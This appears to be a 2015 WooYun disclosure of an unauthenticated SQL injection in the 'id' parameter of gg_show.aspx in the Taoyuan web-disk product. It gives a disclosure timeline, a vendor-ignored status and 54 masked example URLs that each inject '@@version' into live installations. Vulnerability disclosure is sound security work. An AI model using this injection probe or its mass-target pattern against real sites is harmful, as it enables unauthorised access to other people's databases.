乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-25: 细节已通知厂商并且等待厂商处理中 2015-08-30: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-10-24: 细节向核心白帽子及相关领域专家公开 2015-11-03: 细节向普通白帽子公开 2015-11-13: 细节向实习白帽子公开 2015-11-28: 细节向公众公开
无需登录
桃源网盘的用户量我就不多说了吧,公网外没有上万也有上千吧,谷歌搜前50页没有重复,希望厂商快点修复吧~SQL Injection:
/gg_show.aspx?id=1
案例可不是闹着玩的,随随便便来几十发:
1.http://**.**.**/gg_show.aspxid=@@version 官方demo_2.http://**.**.**/gg_show.aspxid=@@version_3.http://**.**.**/gg_show.aspxid=@@version_4.http://**.**.**/gg_show.aspxid=@@version_5.http://**.**.**/gg_show.aspxid=@@version_6.http://**.**.**/gg_show.aspxid=@@version_7.http://**.**.**/gg_show.aspxid=@@version_8.http://**.**.**/gg_show.aspxid=@@version_9.http://**.**.**/webdisk//gg_show.aspxid=@@version_10.http://**.**.**/gg_show.aspxid=@@version_11.http://**.**.**/gg_show.aspxid=@@version_12.http://**.**.**/gg_show.aspxid=@@version_13.http://**.**.**/gg_show.aspxid=@@version_14.http://**.**.**/gg_show.aspxid=@@version_15.http://**.**.**/gg_show.aspxid=@@version_16.http://**.**.**/gg_show.aspxid=@@version_17.http://**.**.**/gg_show.aspxid=@@version_18.http://**.**.**/gg_show.aspxid=@@version_19.http://**.**.**/gg_show.aspxid=@@version_20.http://**.**.**/gg_show.aspxid=@@version_21.http://**.**.**/gg_show.aspxid=@@version_22.http://**.**.**/gg_show.aspxid=@@version_23.http://**.**.**/gg_show.aspxid=@@version_24.http://**.**.**//gg_show.aspxid=@@version_25.http://**.**.**/gg_show.aspxid=@@version_26.http://**.**.**/gg_show.aspxid=@@version_27.http://**.**.**/gg_show.aspxid=@@version_28.http://**.**.**/gg_show.aspxid=@@version_29.http://**.**.**/gg_show.aspxid=@@version_30.http://**.**.**/gg_show.aspxid=@@version_31.http://**.**.**/gg_show.aspxid=@@version_32.http://**.**.**/gg_show.aspxid=@@version_33.http://**.**.**/gg_show.aspxid=@@version_34.http://**.**.**/gg_show.aspxid=@@version_35.http://**.**.**/gg_show.aspxid=@@version_36.http://**.**.**/dxwebdisk//gg_show.aspxid=@@version_37.http://**.**.**/webdisk//gg_show.aspxid=@@version_38.http://**.**.**//gg_show.aspxid=@@version_39.http://**.**.**/gg_show.aspxid=@@version_40.http://**.**.**/wdisk//gg_show.aspxid=@@version_41.http://**.**.**/gg_show.aspxid=@@version_42.http://**.**.**/gg_show.aspxid=@@version_43.http://**.**.**/gg_show.aspxid=@@version_44.http://**.**.**/gg_show.aspxid=@@version_45.http://**.**.**/gg_show.aspxid=@@version_46.http://**.**.**/gg_show.aspxid=@@version_47.http://**.**.**/gg_show.aspxid=@@version_48.http://**.**.**/gg_show.aspxid=@@version_49.http://**.**.**/gg_show.aspxid=@@version_50.http://**.**.**/gg_show.aspxid=@@version_51.http://**.**.**/wjfw/gg_show.aspxid=@@version_52.http://**.**.**/gg_show.aspxid=@@version_53.http://**.**.**/gg_show.aspxid=@@version_54.http://**.**.**//gg_show.aspxid=@@version
危害等级:无影响厂商忽略
忽略时间:2015-11-28 16:22
漏洞Rank:15 (WooYun评价)
暂无
